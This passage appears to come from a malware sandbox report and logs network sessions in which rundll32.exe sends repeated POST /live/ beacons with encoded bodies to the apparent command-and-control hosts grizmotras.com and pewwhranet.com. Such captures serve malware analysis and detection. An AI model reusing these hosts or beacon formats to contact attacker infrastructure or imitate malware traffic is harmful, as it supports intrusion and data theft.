                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmISHXtytZ1o152TZQyvMc3TmrVbB%2BXjNNBMCWqpmRaQ%2Bxs0BbitFKzBNqpBcTtKDcU%2BNwWePEiLii6%2B9HRcdzq%2Fusxfg2MGvng9aOrU%2Bcuj60rSEm6Jqo6QkpeRYcbo4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c26dd87a668-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:19 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID: 49 | Source IP: 192.168.2.5 | Source Port: 49772 | Destination IP: 172.67.219.28 | Destination Port: 443 | PID: 180 | Process: C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:19 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:19 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RpA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:23 UTC | 574 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFS8y4yv4RhoKAh8E9euUEv6v0IbFNQf7vzUtDgcWIywoybVxMq3MzvK0g5nDT5sXSxEWlFvh5o537QMvW2PjOaev6Baybu8Wx2Q8OAX74ksuVsgHa2%2FsQlylpgYPqZ%2FFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c472e0609c6-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:23 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID: 50 | Source IP: 192.168.2.5 | Source Port: 49773 | Destination IP: 172.67.219.28 | Destination Port: 443 | PID: 180 | Process: C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:23 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:23 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RpAsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:27 UTC | 586 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2FajbxOg0gWAvfnVeMhmSrVu10wsgIyGz%2F%2BvqiQhr%2FQGg19768w3s%2B8P%2BwnSUsRI4G9h9aNdnpN68%2B9t9brsY0f0bShVIXMYsmXLvbrthkzmPY%2FV1XorCNl4OUQwgxdF5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c600f23a663-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:27 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                51 | 192.168.2.5 | 49774 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:28 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:38 UTC | 580 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:38 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQ8QZEEaT4%2FJmbQvAI8mVoto%2BNbXir6dIRs5drsxSZdJNsdII4qRzof0NgU04dNrM8c1qNWxM%2B6NaBOocVZK1zDHLcTUR1hoPcm0dP9LMe0z%2BIX4xz%2BlBsalgSAoQ7EjOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c79fc72a55e-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                52 | 192.168.2.5 | 49775 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:39 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:42 UTC | 570 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MrsCbsGpuKdSelD9zef7FKxfaadTTHJ1tm2VpfqBRuRRrT0f6HL4q6dFYqe2E5o8rKp6Z48FHkFQmGbH0kRAAgUJdRFTHEfLogKFbs6V2sgTYxnt9GwsUHwa9voQ9TvAIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99cbf2b2f02e4-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                53 | 192.168.2.5 | 49776 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:43 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:47 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=olHAgBuw%2BnGRDgqUV5%2Fa72bEvLONX6yR2g3KfjDOnvgRI2BTgFx6MZgBZGycfDhlwyU02jEXPM1Lq%2FCPmYAozyAi%2BsYwTMvcZVechoXBgUsSttlXySAAxSfiYg4285AUow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99cd8ea0b7489-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                54 | 192.168.2.5 | 49777 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:47 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:54 UTC | 570 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oG9BGwJWVZtohXag8JUjal2EPhdhIPXwC3VCGX989QqpuzcVp9JSPxAXatgGZs7LLgx92lOEpF6dxoi2zrwHn1HStIoEWZ1LzEOq5Emcz4ZOAKEKnh6ith2POaRzmKu6hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99cf61cefa65d-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                55 | 192.168.2.5 | 49778 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:54 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:59 UTC | 576 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FcUGqNdJU0pXP8TXEuTuO%2F6uZ4f8sUqTVNz3QYhslkkMvOmaJ9t5uev6li1bHYNkr53NFFxc%2Bmy4H8EAkMdopVz8fzceYguqV56mHoWAW2JWAQ60QkD8H3T8IJcTM8ilQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99d202ca80318-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                56 | 192.168.2.5 | 49779 | 20.42.73.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:58 UTC | 828 | OUT | POST /OneCollector/1.0/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
                                                                                                AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=
                                                                                                Client-Id: NO_AUTH
                                                                                                Content-Encoding: deflate
                                                                                                Content-Type: application/bond-compact-binary
                                                                                                Expect: 100-continue
                                                                                                SDK-Version: EVT-Windows-C++-No-3.4.15.1
                                                                                                Upload-Time: 1714166397033
                                                                                                Host: self.events.data.microsoft.com
                                                                                                Content-Length: 7972
                                                                                                Connection: Keep-Alive
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:58 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                                                2024-04-26 21:19:58 UTC | 443 | IN | HTTP/1.1 200 OK
                                                                                                Content-Length: 9
                                                                                                Content-Type: application/json
                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                time-delta-millis: 1183
                                                                                                Access-Control-Allow-Headers: time-delta-millis
                                                                                                Access-Control-Allow-Methods: POST
                                                                                                Access-Control-Allow-Credentials: true
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                Date: Fri, 26 Apr 2024 21:19:57 GMT
                                                                                                Connection: close
                                                                                                {"acc":4}


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                57 | 192.168.2.5 | 49780 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:00 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:00 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                58 | 192.168.2.5 | 49781 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:08 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:08 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                59 | 192.168.2.5 | 49782 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:12 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:12 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:20:16 UTC | 580 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:20:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYDkiWclmWEzl6gPS%2BZ6ccSKz3ciKT%2BhnwUGc1%2BwmZ%2FafkGJ7gYt77lLjwY4yJMZKe0p6cpnqxpNN%2BObaLjM2h0vsqZnF3hutuq64VWa2QxLTfG2L0xtxMfCxXN0io2fbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99d8fa88ca575-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:20:16 UTC | 118 | IN | Data:
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:20:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                60 | 192.168.2.5 | 49783 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:16 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:16 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                61 | 192.168.2.5 | 49784 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:21 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:21 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                62 | 192.168.2.5 | 49785 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:25 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:25 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                63 | 192.168.2.5 | 49786 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:29 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:29 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                64 | 192.168.2.5 | 49787 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:34 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:34 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                65 | 192.168.2.5 | 49788 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:38 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:38 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                66 | 192.168.2.5 | 49789 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:42 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:42 UTC | 180 | OUT | Data:
                                                                                                Data Ascii: YjOeEyiMk3RoAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                67 | 192.168.2.5 | 49790 | 104.21.84.207 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:20:46 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:20:46 UTC | 180 | OUT | Data:
